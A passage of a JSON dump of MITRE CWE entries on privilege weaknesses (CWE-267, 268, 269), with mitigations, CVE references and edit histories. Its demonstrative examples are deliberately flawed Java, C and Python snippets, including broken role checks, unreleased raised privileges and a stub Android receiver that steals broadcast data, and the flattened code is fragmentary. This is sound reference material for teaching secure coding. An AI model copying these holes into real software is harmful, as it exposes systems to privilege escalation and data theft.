accounts."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-97"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"seteuid(0);seteuid(getuid());","xhtml:br":["","",""],"xhtml:i":"/* do some stuff */"}}},{"attr":{"@_Demonstrative_Example_ID":"DX-142"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"AccessController.doPrivileged(new PrivilegedAction() {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object run() {}","xhtml:div":{"#text":"System.loadLibrary(\\"awt\\");return null;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// privileged code goes here, for example:","// nothing to return"],"xhtml:br":["","","",""]}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-108"},"Intro_Text":"This application sends a special intent with a flag that allows the receiving application to read a data file for backup purposes.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Intent intent = new Intent();intent.setAction(\\"com.example.BackupUserData\\");intent.setData(file_uri);intent.addFlags(FLAG_GRANT_READ_URI_PERMISSION);sendBroadcast(intent);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack","@_Language":"Java"},"xhtml:div":{"#text":"public class CallReceiver extends BroadcastReceiver {}","xhtml:div":{"#text":"@Overridepublic void onReceive(Context context, Intent intent) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"Uri userData = intent.getData();stealUserData(userData);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}],"Body_Text":"Any malicious application can register to receive this intent. Because of the FLAG_GRANT_READ_URI_PERMISSION included with the intent, the malicious receiver code can read the user\'s data."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-1999-1193","Description":"untrusted user placed in unix \\"wheel\\" group","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193"},{"Reference":"CVE-2005-2741","Description":"Product allows users to grant themselves certain rights that can be used to escalate privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2741"},{"Reference":"CVE-2005-2496","Description":"Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2496"},{"Reference":"CVE-2004-0274","Description":"Product mistakenly assigns a particular status to an entity, leading to increased privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0274"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incorrect Privilege Assignment"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC00-J","Entry_Name":"Do not allow privileged blocks to leak sensitive information across a trust boundary"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SEC01-J","Entry_Name":"Do not allow tainted variables in privileged blocks"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-76"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Causal_Nature, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"267":{"attr":{"@_ID":"267","@_Name":"Privilege Defined With Unsafe Actions","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A particular privilege, role, capability, or right can be used to perform unsafe actions that were not intended, even when it is assigned to the correct entity.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can access restricted functionality and/or sensitive information that may include administrative functionality and user accounts."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-127"},"Intro_Text":"This code intends to allow only Administrators to print debug information about a system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void printDebugInfo(User requestingUser){}","xhtml:div":[{"#text":"ADMIN,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){}else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:default:","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(currentDebugState());break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of \\"GUEST\\". Someone with the role of \\"ADMIN\\" or \\"USER\\" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1981","Description":"Roles have access to dangerous procedures (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1981"},{"Reference":"CVE-2002-1671","Description":"Untrusted object/method gets access to clipboard (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1671"},{"Reference":"CVE-2004-2204","Description":"Gain privileges using functions/tags that should be restricted (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2204"},{"Reference":"CVE-2000-0315","Description":"Traceroute program allows unprivileged users to modify source address of packet (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0315"},{"Reference":"CVE-2004-0380","Description":"Bypass domain restrictions using a particular file that references unsafe URI schemes (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0380"},{"Reference":"CVE-2002-1154","Description":"Script does not restrict access to an update command, leading to resultant disk consumption and filled error logs (Accessible entities).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1154"},{"Reference":"CVE-2002-1145","Description":"\\"public\\" database user can use stored procedure to modify data controlled by the database owner (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1145"},{"Reference":"CVE-2000-0506","Description":"User with capability can prevent setuid program from dropping privileges (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0506"},{"Reference":"CVE-2002-2042","Description":"Allows attachment to and modification of privileged processes (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2042"},{"Reference":"CVE-2000-1212","Description":"User with privilege can edit raw underlying object using unprotected method (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1212"},{"Reference":"CVE-2005-1742","Description":"Inappropriate actions allowed by a particular role(Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1742"},{"Reference":"CVE-2001-1480","Description":"Untrusted entity allowed to access the system clipboard (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1480"},{"Reference":"CVE-2001-1551","Description":"Extra Linux capability allows bypass of system-specified restriction (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1551"},{"Reference":"CVE-2001-1166","Description":"User with debugging rights can read entire process (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1166"},{"Reference":"CVE-2005-1816","Description":"Non-root admins can add themselves or others to the root admin group (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1816"},{"Reference":"CVE-2005-2173","Description":"Users can change certain properties of objects to perform otherwise unauthorized actions (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2173"},{"Reference":"CVE-2005-2027","Description":"Certain debugging commands not restricted to just the administrator, allowing registry modification and infoleak (Unsafe privileged actions).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2027"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unsafe Privilege"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"58"}},{"attr":{"@_CAPEC_ID":"634"}},{"attr":{"@_CAPEC_ID":"637"}},{"attr":{"@_CAPEC_ID":"643"}},{"attr":{"@_CAPEC_ID":"648"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-76"}}},"Notes":{"Note":{"attr":{"@_Type":"Maintenance"},"xhtml:p":"Note: there are 2 separate sub-categories here:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["- privilege incorrectly allows entities to perform certain actions","- object is incorrectly accessible to entities with a given privilege"]}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}],"Previous_Entry_Name":{"#text":"Unsafe Privilege","attr":{"@_Date":"2008-04-11"}}}},"268":{"attr":{"@_ID":"268","@_Name":"Privilege Chaining","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Two distinct privileges, roles, capabilities, or rights can be combined in a way that allows an entity to perform unsafe actions that would not be allowed without that combination.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"269","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"A user can be given or gain access rights of another user. This can give the user unauthorized access to sensitive information including the access information of another user."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."},{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-128"},"Intro_Text":"This code allows someone with the role of \\"ADMIN\\" or \\"OPERATOR\\" to reset a user\'s password. The role of \\"OPERATOR\\" is intended to have less privileges than an \\"ADMIN\\", but still be able to help users with small issues such as forgotten passwords.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void resetPassword(User requestingUser, User user, String password ){}","xhtml:div":[{"#text":"ADMIN,OPERATOR,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:case USER:default:}","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"setPassword(user,password);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1736","Description":"Chaining of user rights.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1736"},{"Reference":"CVE-2002-1772","Description":"Gain certain rights via privilege chaining in alternate channel.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1772"},{"Reference":"CVE-2005-1973","Description":"Application is allowed to assign extra permissions to itself.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1973"},{"Reference":"CVE-2003-0640","Description":"\\"operator\\" user can overwrite usernames and passwords to gain admin privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0640"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Privilege Chaining"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-76"}}},"Notes":{"Note":[{"#text":"There is some conceptual overlap with Unsafe Privilege.","attr":{"@_Type":"Relationship"}},{"#text":"It is difficult to find good examples for this weakness.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Other_Notes, Potential_Mitigations, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"}]}},"269":{"attr":{"@_ID":"269","@_Name":"Improper Privilege Management","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-1"},"Phase":["Architecture and Design","Operation"],"Description":"Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software."},{"attr":{"@_Mitigation_ID":"MIT-48"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Follow the principle of least privilege when assigning access rights to entities in a software system."},{"attr":{"@_Mitigation_ID":"MIT-49"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Consider following the principle of separation of privilege. Require multiple conditions to be met before permitting access to a system resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-126"},"Intro_Text":"This code temporarily raises the program\'s privileges to allow creation of a new user folder.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def makeNewUserDir(username):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if invalidUsername(username):try:except OSError:return True","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"print(\'Usernames cannot contain invalid characters\')return False","xhtml:br":["","",""],"xhtml:i":"#avoid CWE-22 and CWE-78"}},{"#text":"raisePrivileges()os.mkdir(\'/home/\' + username)lowerPrivileges()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"print(\'Unable to create new user directory for user:\' + username)return False","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","",""]}}}},"Body_Text":"While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur."},{"attr":{"@_Demonstrative_Example_ID":"DX-97"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"seteuid(0);seteuid(getuid());","xhtml:br":["","",""],"xhtml:i":"/* do some stuff */"}}},{"attr":{"@_Demonstrative_Example_ID":"DX-142"},"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"AccessController.doPrivileged(new PrivilegedAction() {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public Object run() {}","xhtml:div":{"#text":"System.loadLibrary(\\"awt\\");return null;","attr":{"@_style":"margin-left:10px;"},"xhtml:i":["// privileged code goes here, for example:","// nothing to return"],"xhtml:br":["","","",""]}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-127"},"Intro_Text":"This code intends to allow only Administrators to print debug information about a system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void printDebugInfo(User requestingUser){}","xhtml:div":[{"#text":"ADMIN,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){}else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:default:","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(currentDebugState());break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":""}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"While the intention was to only allow Administrators to print the debug information, the code as written only excludes those with the role of \\"GUEST\\". Someone with the role of \\"ADMIN\\" or \\"USER\\" will be allowed access, which goes against the original intent. An attacker may be able to use this debug information to craft an attack on the system."},{"attr":{"@_Demonstrative_Example_ID":"DX-128"},"Intro_Text":"This code allows someone with the role of \\"ADMIN\\" or \\"OPERATOR\\" to reset a user\'s password. The role of \\"OPERATOR\\" is intended to have less privileges than an \\"ADMIN\\", but still be able to help users with small issues such as forgotten passwords.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public enum Roles {}public void resetPassword(User requestingUser, User user, String password ){}","xhtml:div":[{"#text":"ADMIN,OPERATOR,USER,GUEST","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if(isAuthenticated(requestingUser)){else{}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"switch(requestingUser.role){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"case GUEST:case USER:default:}","xhtml:div":[{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"System.out.println(\\"You are not authorized to perform this command\\");break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"#text":"setPassword(user,password);break;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""]}}}},{"#text":"System.out.println(\\"You must be logged in to perform this command\\");","attr":{"@_style":"margin-left:10px;"}}],"xhtml:br":""}}],"xhtml:br":["",""]}},"Body_Text":"This code does not check the role of the user whose password is being reset. It is possible for an Operator to gain Admin privileges by resetting the password of an Admin account and taking control of that account."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1555","Description":"Terminal privileges are not reset when a user logs out.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1555"},{"Reference":"CVE-2001-1514","Description":"Does not properly pass security context to child processes in certain cases, allows privilege escalation.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1514"},{"Reference":"CVE-2001-0128","Description":"Does not properly compute roles.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0128"},{"Reference":"CVE-1999-1193","Description":"untrusted user placed in unix \\"wheel\\" group","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193"},{"Reference":"CVE-2005-2741","Description":"Product allows users to grant themselves certain rights that can be used to escalate privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2741"},{"Reference":"CVE-2005-2496","Description":"Product uses group ID of a user instead of the group, causing it to run with different privileges. This is resultant from some other unknown issue.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2496"},{"Reference":"CVE-2004-0274","Description":"Product mistakenly assigns a particular status to an entity, leading to increased privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0274"},{"Reference":"CVE-2007-4217","Description":"FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4217"},{"Reference":"CVE-2007-5159","Description":"OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5159"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2007-3931","Description":"Installation script installs some programs as setuid when they shouldn\'t 